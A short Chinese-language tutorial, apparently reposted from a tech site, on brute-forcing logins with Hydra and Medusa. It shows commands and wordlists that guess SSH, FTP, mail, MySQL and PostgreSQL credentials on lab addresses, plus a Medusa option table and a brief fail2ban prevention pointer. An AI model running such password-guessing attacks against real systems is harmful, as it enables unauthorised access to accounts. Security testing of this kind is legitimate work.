hydra海德拉使用
hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql 讯享网
讯享网基本命令参数: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh
-L:指定用户名存放的文件 包含各式各样的用户名
-P:指定密码字典文件
作为测试首先创建这两个文件查看下里边的内容
root@kali:~# cat userlist.txt admin root tianyun yangge zhuzhuxia root@kali:~# cat passlist.txt 123 abc,123 root admin owaspbwa yangg root@kali:~# hydra -L userlist.txt -P passlist.txt -t 20 192.168.106.134 ssh 用户名和密码会直接显示出来
Medusa美杜莎
讯享网medusa -h 192.168.137.133 -u root -P /home/chenglee/zidian/wordlist.TXT -M mysql
-h [TEXT] 目标IP
-H [FILE] 目标主机文件
-u [TEXT] 用户名
-U [FILE] 用户名文件
-p [TEXT] 密码
-P [FILE] 密码文件
-C [FILE] 组合条目文件
-O [FILE] 文件日志信息
-e [n/s/ns] N意为空密码,S意为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块
-d 显示所有的模块名称
-n [NUM] 使用非默认端口
-s 启用SSL
-r [NUM] 重试间隔时间,默认为3秒
-t [NUM] 设定线程数量
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止激活成功教程
-q 显示模块的使用信息
-v [NUM] 详细级别(0-6)
-w [NUM] 错误调试级别(0-10)
-V 显示版本
-Z [TEXT] 继续扫描上一次
---------------------
例子
1、 查看可用模块
medusa -d
2、 查看模块帮助
medusa -M postgres -q
3、 猜解postgresql数据库密码
medusa -H /tmp/ip.txt -u postgres -n 5432 -P /tmp/pass.txt -e ns -M postgres -T 255 -f -O /tmp/good.txt -r 0
预防
http://www.fail2ban.org
使用方法
cd fail2ban-0.8.14
python setup.py install
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/37352.html